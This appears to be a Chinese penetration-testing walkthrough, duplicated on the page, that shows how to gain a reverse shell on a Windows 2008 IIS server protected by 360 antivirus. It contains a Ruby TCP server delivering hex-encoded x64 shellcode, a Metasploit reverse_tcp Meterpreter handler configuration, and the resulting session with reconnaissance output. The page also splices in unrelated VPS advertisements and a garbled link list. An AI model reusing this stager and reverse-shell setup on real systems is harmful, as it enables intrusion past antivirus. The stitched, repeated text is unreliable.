靶机mscorsvw
mscorsvw 时间:2021-05-23 阅读:()
专注APT攻击与防御https://micropoor.
blogspot.
com/攻击机:192.
168.
1.
4Debian靶机:192.
168.
1.
2Windows2008目标机安装:360卫士+360杀毒12[*]磁盘列表[C:D:E:]34C:\inetpub\wwwroot\>tasklist56映像名称PID会话名会话#内存使用78SystemIdleProcess0024K9System40372K10smss.
exe2360956K11csrss.
exe32405,572K12csrss.
exe364114,452K13wininit.
exe37204,508K14winlogon.
exe40815,364K15services.
exe46807,376K16lsass.
exe47609,896K17lsm.
exe48403,876K18svchost.
exe57608,684K19vmacthlp.
exe63203,784K20svchost.
exe67607,384K21svchost.
exe764012,716K22svchost.
exe800029,792K23svchost.
exe848011,248K24svchost.
exe90009,308K25svchost.
exe940016,184K26svchost.
exe332011,800K27spoolsv.
exe548015,568K28svchost.
exe105208,228K29svchost.
exe107608,808K30svchost.
exe114402,576K31VGAuthService.
exe1216010,360K32vmtoolsd.
exe1300018,068K33ManagementAgentHost.
exe133208,844K34svchost.
exe1368011,884K35WmiPrvSE.
exe1768013,016K36dllhost.
exe1848011,224K37msdtc.
exe194007,736K38WmiPrvSE.
exe1440019,768K39mscorsvw.
exe29604,732K40mscorsvw.
exe58405,088K41sppsvc.
exe147608,408K42taskhost.
exe261216,344K43dwm.
exe286814,604K44explorer.
exe2896144,912K45vmtoolsd.
exe3008117,744K46TrustedInstaller.
exe2268015,776K47360Tray.
exe268416,056K48360sd.
exe263611,316K49ZhuDongFangYu.
exe2456014,292K50360rp.
exe1712127,072K51SoftMgrLite.
exe864116,816K52w3wp.
exe3300042,836K53svchost.
exe384004,584K54notepad.
exe371215,772K55cmd.
exe338402,376K56conhost.
exe352003,420K57tasklist.
exe309605,276K581C:\>dir2驱动器C中的卷没有标签.
3卷的序列号是C6F8‐9BAB45C:\的目录672017/12/1303:28inetpub82009/07/1411:20PerfLogs92017/12/1303:28ProgramFiles102019/01/2314:09ProgramFiles(x86)112019/01/2314:15Users122017/12/1303:25Windows130个文件0字节146个目录21,387,132,928可用字节15目标机位x64位Windows20081C:\>ver23MicrosoftWindows[版本6.
1.
7600]配置payload:1root@John:/var/www/html#cat.
/Micropoor_rev.
rb2require'socket'3ifARGV.
empty4puts"Usage:"5puts"Micropoor.
rbport"6exit7end89PORT=ARGV.
first.
to_i1011defhandle_connection(client)12puts"Payloadison‐line#{client}"1314client.
write("4831c94881e9c0ffffff488d05efffffff48bb32667fcceeadb9f748315827482df8ffffffe2f4ce2efc281e4575f732663e9daffdeba6642e4e1e8be532a5522ef49ef6e532a5122ef4bebee5b640782c32fd27e588379e5a1eb0ec8199b6f3af728def6c5b1a60272e8465ff997c705a37cd3ecb388f2a6d7dc36bdfb9f732edff44eeadb9bfb7a60baba6ac69a7b92e678865ed99be33b69c9aa65270b6b952f784ef7bf4c6fb2e4e0c42ec783e3f277e0dd64dcc067e6533e8e6e8802647be278865ed9dbe33b6198d65a1f1b3b9266385ef7df87c36ee37cd3eece1b66a382696aff5f8ae733c374f028df8a5cd86278db7f7f17c208f34331152e4be8c110cfeb19e8bf732272985674bf176dec67ecceee430127bda7dccee98795f33623e98a7245dbbbb973e76a2da9ff0cdb3334504c5b8f63266268d5484399c3299aaa6e4ece7a7622b4e05a39c79bfcda637452ce546377aefbe8d5447b628d299aa84676ad3e7733e33450ce5300e73dce6699acc4622b7a60bc6a7527782d78eeccceeadf174de7637450ce0883e58623e94a62440b68864a604b1526c74ca660199a62e7dd76cef89a6aeece09f32767fccaff5f17ec02e4e05af17e15361838019a6247abebba132fd27e430077aefa5846754f84d30bfb79311783a0f321b5794affae09f32267fccaff5d3f76827c5c7c1a28908e731268d54d8d7ba5399aa85116350cbcd998084ef6ef1def42efa3a9b19f808d53e15ccb7e47e35c2d3dd9a1178b9f7")15client.
close16end1718socket=TCPServer.
new('0.
0.
0.
0',PORT)19puts"Listeningon#{PORT}.
"2021whileclient=socket.
accept22Thread.
new{handle_connection(client)}23end2425root@John:/var/www/html#ruby.
/Micropoor_rev.
rb808026Listeningon8080.
27上传Micropoor_shellcode_x64.
exe配置msf:1msfexploit(multi/handler)>useexploit/multi/handler2msfexploit(multi/handler)>setpayloadwindows/x64/meterpreter/reverse_tcp3payload=>windows/x64/meterpreter/reverse_tcp4msfexploit(multi/handler)>showoptions56Moduleoptions(exploit/multi/handler):78NameCurrentSettingRequiredDescription9101112Payloadoptions(windows/x64/meterpreter/reverse_tcp):1314NameCurrentSettingRequiredDescription1516EXITFUNCprocessyesExittechnique(Accepted:'',seh,thread,process,none)17LHOST192.
168.
1.
4yesThelistenaddress(aninterfacemaybespecified)18LPORT53yesThelistenport192021Exploittarget:2223IdName24‐‐‐‐‐‐250WildcardTarget262728msfexploit(multi/handler)>exploit2930[*]StartedreverseTCPhandleron192.
168.
1.
4:5331靶机执行:1msfexploit(multi/handler)>exploit23[*]StartedreverseTCPhandleron192.
168.
1.
4:534[*]Sendingstage(206403bytes)to192.
168.
1.
25[*]Meterpretersession6opened(192.
168.
1.
4:53‐>192.
168.
1.
2:49744)at2019‐01‐2301:29:00‐050067meterpreter>getuid8Serverusername:IISAPPPOOL\DefaultAppPool9meterpreter>sysinfo10Computer:WIN‐5BMI9HGC42S11OS:Windows2008R2(Build7600).
12Architecture:x6413SystemLanguage:zh_CN14Domain:WORKGROUP15LoggedOnUsers:116Meterpreter:x64/windows17meterpreter>ipconfig1819Interface12021Name:SoftwareLoopbackInterface122HardwareMAC:00:00:00:00:00:0023MTU:429496729524IPv4Address:127.
0.
0.
125IPv4Netmask:255.
0.
0.
026IPv6Address:::127IPv6Netmask:ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff282930Interface113132Name:Intel(R)PRO/1000MTNetworkConnection33HardwareMAC:00:0c:29:bc:0d:5c34MTU:150035IPv4Address:192.
168.
1.
236IPv4Netmask:255.
255.
255.
037IPv6Address:fe80::5582:70c8:a5a8:822338IPv6Netmask:ffff:ffff:ffff:ffff::391meterpreter>ps23ProcessList456PIDPPIDNameArchSessionUserPath7800[SystemProcess]940System102364smss.
exe11296468mscorsvw.
exe12324316csrss.
exe13332468svchost.
exe14364356csrss.
exe15372316wininit.
exe16408356winlogon.
exe17468372services.
exe18476372lsass.
exe19484372lsm.
exe20548468spoolsv.
exe21576468svchost.
exe22584468mscorsvw.
exe23632468vmacthlp.
exe24676468svchost.
exe25764468svchost.
exe26800468svchost.
exe27848468svchost.
exe288642684SoftMgrLite.
exe29900468svchost.
exe30940468svchost.
exe311052468svchost.
exe321076468svchost.
exe331144468svchost.
exe341216468VGAuthService.
exe351300468vmtoolsd.
exe361332468ManagementAgentHost.
exe371368468svchost.
exe381440576WmiPrvSE.
exe391476468sppsvc.
exe4017122636360rp.
exe411768576WmiPrvSE.
exe421848468dllhost.
exe431940468msdtc.
exe442456468ZhuDongFangYu.
exe452612468taskhost.
exe4626361096360sd.
exe4726841096360Tray.
exe4827883408Micropoor_shellcode_x64.
exex640IISAPPPOOL\DefaultAppPoolC:\inetpub\wwwroot\Micropoor_shellcode_x64.
exe492868900dwm.
exe5028962852explorer.
exe5130082896vmtoolsd.
exe523196468svchost.
exe5333001368w3wp.
exex640IISAPPPOOL\DefaultAppPoolc:\windows\system32\inetsrv\w3wp.
exe5434083300cmd.
exex640IISAPPPOOL\DefaultAppPoolC:\Windows\system32\cmd.
exe5537122896notepad.
exe564092324conhost.
exex640IISAPPPOOL\DefaultAppPoolC:\Windows\system32\conhost.
exe5758meterpreter>59靶机:附录:Micropoor_shellcodeforpayloadbackdoorhttps://micropoor.
blogspot.
com/2019/01/micropoorshellcode-for-payload-backdoor.
htmlMicropoor
blogspot.
com/攻击机:192.
168.
1.
4Debian靶机:192.
168.
1.
2Windows2008目标机安装:360卫士+360杀毒12[*]磁盘列表[C:D:E:]34C:\inetpub\wwwroot\>tasklist56映像名称PID会话名会话#内存使用78SystemIdleProcess0024K9System40372K10smss.
exe2360956K11csrss.
exe32405,572K12csrss.
exe364114,452K13wininit.
exe37204,508K14winlogon.
exe40815,364K15services.
exe46807,376K16lsass.
exe47609,896K17lsm.
exe48403,876K18svchost.
exe57608,684K19vmacthlp.
exe63203,784K20svchost.
exe67607,384K21svchost.
exe764012,716K22svchost.
exe800029,792K23svchost.
exe848011,248K24svchost.
exe90009,308K25svchost.
exe940016,184K26svchost.
exe332011,800K27spoolsv.
exe548015,568K28svchost.
exe105208,228K29svchost.
exe107608,808K30svchost.
exe114402,576K31VGAuthService.
exe1216010,360K32vmtoolsd.
exe1300018,068K33ManagementAgentHost.
exe133208,844K34svchost.
exe1368011,884K35WmiPrvSE.
exe1768013,016K36dllhost.
exe1848011,224K37msdtc.
exe194007,736K38WmiPrvSE.
exe1440019,768K39mscorsvw.
exe29604,732K40mscorsvw.
exe58405,088K41sppsvc.
exe147608,408K42taskhost.
exe261216,344K43dwm.
exe286814,604K44explorer.
exe2896144,912K45vmtoolsd.
exe3008117,744K46TrustedInstaller.
exe2268015,776K47360Tray.
exe268416,056K48360sd.
exe263611,316K49ZhuDongFangYu.
exe2456014,292K50360rp.
exe1712127,072K51SoftMgrLite.
exe864116,816K52w3wp.
exe3300042,836K53svchost.
exe384004,584K54notepad.
exe371215,772K55cmd.
exe338402,376K56conhost.
exe352003,420K57tasklist.
exe309605,276K581C:\>dir2驱动器C中的卷没有标签.
3卷的序列号是C6F8‐9BAB45C:\的目录672017/12/1303:28inetpub82009/07/1411:20PerfLogs92017/12/1303:28ProgramFiles102019/01/2314:09ProgramFiles(x86)112019/01/2314:15Users122017/12/1303:25Windows130个文件0字节146个目录21,387,132,928可用字节15目标机位x64位Windows20081C:\>ver23MicrosoftWindows[版本6.
1.
7600]配置payload:1root@John:/var/www/html#cat.
/Micropoor_rev.
rb2require'socket'3ifARGV.
empty4puts"Usage:"5puts"Micropoor.
rbport"6exit7end89PORT=ARGV.
first.
to_i1011defhandle_connection(client)12puts"Payloadison‐line#{client}"1314client.
write("4831c94881e9c0ffffff488d05efffffff48bb32667fcceeadb9f748315827482df8ffffffe2f4ce2efc281e4575f732663e9daffdeba6642e4e1e8be532a5522ef49ef6e532a5122ef4bebee5b640782c32fd27e588379e5a1eb0ec8199b6f3af728def6c5b1a60272e8465ff997c705a37cd3ecb388f2a6d7dc36bdfb9f732edff44eeadb9bfb7a60baba6ac69a7b92e678865ed99be33b69c9aa65270b6b952f784ef7bf4c6fb2e4e0c42ec783e3f277e0dd64dcc067e6533e8e6e8802647be278865ed9dbe33b6198d65a1f1b3b9266385ef7df87c36ee37cd3eece1b66a382696aff5f8ae733c374f028df8a5cd86278db7f7f17c208f34331152e4be8c110cfeb19e8bf732272985674bf176dec67ecceee430127bda7dccee98795f33623e98a7245dbbbb973e76a2da9ff0cdb3334504c5b8f63266268d5484399c3299aaa6e4ece7a7622b4e05a39c79bfcda637452ce546377aefbe8d5447b628d299aa84676ad3e7733e33450ce5300e73dce6699acc4622b7a60bc6a7527782d78eeccceeadf174de7637450ce0883e58623e94a62440b68864a604b1526c74ca660199a62e7dd76cef89a6aeece09f32767fccaff5f17ec02e4e05af17e15361838019a6247abebba132fd27e430077aefa5846754f84d30bfb79311783a0f321b5794affae09f32267fccaff5d3f76827c5c7c1a28908e731268d54d8d7ba5399aa85116350cbcd998084ef6ef1def42efa3a9b19f808d53e15ccb7e47e35c2d3dd9a1178b9f7")15client.
close16end1718socket=TCPServer.
new('0.
0.
0.
0',PORT)19puts"Listeningon#{PORT}.
"2021whileclient=socket.
accept22Thread.
new{handle_connection(client)}23end2425root@John:/var/www/html#ruby.
/Micropoor_rev.
rb808026Listeningon8080.
27上传Micropoor_shellcode_x64.
exe配置msf:1msfexploit(multi/handler)>useexploit/multi/handler2msfexploit(multi/handler)>setpayloadwindows/x64/meterpreter/reverse_tcp3payload=>windows/x64/meterpreter/reverse_tcp4msfexploit(multi/handler)>showoptions56Moduleoptions(exploit/multi/handler):78NameCurrentSettingRequiredDescription9101112Payloadoptions(windows/x64/meterpreter/reverse_tcp):1314NameCurrentSettingRequiredDescription1516EXITFUNCprocessyesExittechnique(Accepted:'',seh,thread,process,none)17LHOST192.
168.
1.
4yesThelistenaddress(aninterfacemaybespecified)18LPORT53yesThelistenport192021Exploittarget:2223IdName24‐‐‐‐‐‐250WildcardTarget262728msfexploit(multi/handler)>exploit2930[*]StartedreverseTCPhandleron192.
168.
1.
4:5331靶机执行:1msfexploit(multi/handler)>exploit23[*]StartedreverseTCPhandleron192.
168.
1.
4:534[*]Sendingstage(206403bytes)to192.
168.
1.
25[*]Meterpretersession6opened(192.
168.
1.
4:53‐>192.
168.
1.
2:49744)at2019‐01‐2301:29:00‐050067meterpreter>getuid8Serverusername:IISAPPPOOL\DefaultAppPool9meterpreter>sysinfo10Computer:WIN‐5BMI9HGC42S11OS:Windows2008R2(Build7600).
12Architecture:x6413SystemLanguage:zh_CN14Domain:WORKGROUP15LoggedOnUsers:116Meterpreter:x64/windows17meterpreter>ipconfig1819Interface12021Name:SoftwareLoopbackInterface122HardwareMAC:00:00:00:00:00:0023MTU:429496729524IPv4Address:127.
0.
0.
125IPv4Netmask:255.
0.
0.
026IPv6Address:::127IPv6Netmask:ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff282930Interface113132Name:Intel(R)PRO/1000MTNetworkConnection33HardwareMAC:00:0c:29:bc:0d:5c34MTU:150035IPv4Address:192.
168.
1.
236IPv4Netmask:255.
255.
255.
037IPv6Address:fe80::5582:70c8:a5a8:822338IPv6Netmask:ffff:ffff:ffff:ffff::391meterpreter>ps23ProcessList456PIDPPIDNameArchSessionUserPath7800[SystemProcess]940System102364smss.
exe11296468mscorsvw.
exe12324316csrss.
exe13332468svchost.
exe14364356csrss.
exe15372316wininit.
exe16408356winlogon.
exe17468372services.
exe18476372lsass.
exe19484372lsm.
exe20548468spoolsv.
exe21576468svchost.
exe22584468mscorsvw.
exe23632468vmacthlp.
exe24676468svchost.
exe25764468svchost.
exe26800468svchost.
exe27848468svchost.
exe288642684SoftMgrLite.
exe29900468svchost.
exe30940468svchost.
exe311052468svchost.
exe321076468svchost.
exe331144468svchost.
exe341216468VGAuthService.
exe351300468vmtoolsd.
exe361332468ManagementAgentHost.
exe371368468svchost.
exe381440576WmiPrvSE.
exe391476468sppsvc.
exe4017122636360rp.
exe411768576WmiPrvSE.
exe421848468dllhost.
exe431940468msdtc.
exe442456468ZhuDongFangYu.
exe452612468taskhost.
exe4626361096360sd.
exe4726841096360Tray.
exe4827883408Micropoor_shellcode_x64.
exex640IISAPPPOOL\DefaultAppPoolC:\inetpub\wwwroot\Micropoor_shellcode_x64.
exe492868900dwm.
exe5028962852explorer.
exe5130082896vmtoolsd.
exe523196468svchost.
exe5333001368w3wp.
exex640IISAPPPOOL\DefaultAppPoolc:\windows\system32\inetsrv\w3wp.
exe5434083300cmd.
exex640IISAPPPOOL\DefaultAppPoolC:\Windows\system32\cmd.
exe5537122896notepad.
exe564092324conhost.
exex640IISAPPPOOL\DefaultAppPoolC:\Windows\system32\conhost.
exe5758meterpreter>59靶机:附录:Micropoor_shellcodeforpayloadbackdoorhttps://micropoor.
blogspot.
com/2019/01/micropoorshellcode-for-payload-backdoor.
htmlMicropoor
- 靶机mscorsvw相关文档
- optedmscorsvw
- Hiddenmscorsvw
- 进程mscorsvw进程占用CPU高怎么办
- 进程mscorsvw进程CPU占用高的问题
- 进程解决mscorsvw进程CPU占用高的方法
- 进程解决mscorsvw进程CPU占用高的方法
提速啦(69元起)香港大带宽CN2+BGP独享云服务器
香港大带宽服务器香港大带宽云服务器目前市场上可以选择的商家十分少,这次给大家推荐的是我们的老便宜提速啦的香港大带宽云服务器,默认通用BGP线路(即CN2+BGP)是由三网直连线路 中国电信骨干网以及HGC、NTT、PCCW等国际线路混合而成的高品质带宽(精品带宽)线路,可有效覆盖全球200多个国家和地区。(适用于绝大部分应用场景,适合国内外访客访问,域名无需备案)提速啦官网链接:点击进入香港Cer...
JUSTG(5.99美元/月)最新5折优惠,KVM虚拟虚拟512Mkvm路线
Justg是一家俄罗斯VPS云服务器提供商,主要提供南非地区的VPS服务器产品,CN2高质量线路网络,100Mbps带宽,自带一个IPv4和8个IPv6,线路质量还不错,主要是用户较少,带宽使用率不高,比较空闲,不拥挤,比较适合面向非洲、欧美的用户业务需求,也适合追求速度快又需要冷门的朋友。justg的俄罗斯VPS云服务器位于莫斯科机房,到美国和中国速度都非常不错,到欧洲的平均延迟时间为40毫秒,...
spinservers:圣何塞10Gbps带宽服务器月付$109起,可升级1Gbps无限流量
spinservers是Majestic Hosting Solutions LLC旗下站点,主营国外服务器租用和Hybrid Dedicated等,数据中心在美国达拉斯和圣何塞机房。目前,商家针对圣何塞部分独立服务器进行促销优惠,使用优惠码后Dual Intel Xeon E5-2650L V3(24核48线程)+64GB内存服务器每月仅109美元起,提供10Gbps端口带宽,可以升级至1Gbp...
mscorsvw为你推荐
-
支持ipad支持ipad支持ipad支持ipad图书馆学、情报学期刊投稿指南itunes备份如何用iTunes备份iPhone127.0.0.1127.0.0.1打不开联通版iphone4s苹果4s怎么分移动版联通版电信版?csshack怎样找css hack 的最新使用方法chrome18chrome的加速功能怎么开启呢?